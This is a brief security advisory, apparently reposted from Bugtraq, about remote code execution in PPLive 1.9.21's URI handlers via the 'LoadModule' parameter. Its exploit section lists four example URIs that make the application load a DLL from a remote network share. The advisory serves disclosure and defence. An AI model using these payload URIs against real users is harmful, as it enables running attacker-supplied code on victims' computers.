|
Feeds -
Exploits
|
|
Written by Nine:Situations:Group::strawdog
|
|
Monday, 06 April 2009 23:11 |
PPLive URI Handlers 'LoadModule' Parameter Multiple Remote Code Execution Vulnerabilities
-\\Bugtraq ID:
34128
-\\Class:
Input Validation Error
-\\CVE:
CVE-2009-1087
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 16 2009 12:00AM
-\\Updated:
Apr 06 2009 10:26PM
-\\Credit:
Nine:Situations:Group::strawdog
-\\Vulnerable:
PPLive PPLive 1.9.21
-\\Discussion
PPLive is prone to multiple remote code-execution vulnerabilities because
the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues can allow an attacker to execute arbitrary code
within the context of the affected application.
PPLive 1.9.21 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
An attacker can exploit this issue by enticing an unsuspecting victim to
follow a malicious URI.
The following example URIs are available:
synacast://www.example.com/?"%20/LoadModule%20\example.com\unc_share\sh.dll%20"
Play://www.example.com/?"%20/LoadModule%20\\example.com\unc_share\sh.dll%20"
pplsv://www.example.com/?"%20/LoadModule%20\\example.com\unc_share\sh.dll%20"
ppvod://www.example.com/?"%20/LoadModule%20\\example.com\unc_share\sh.dll%20"
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we
are in error or if you are aware of more recent information, please mail
us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--PPLive Homepage
http://www.pplive.com/en/index.htm (PPLive)
|
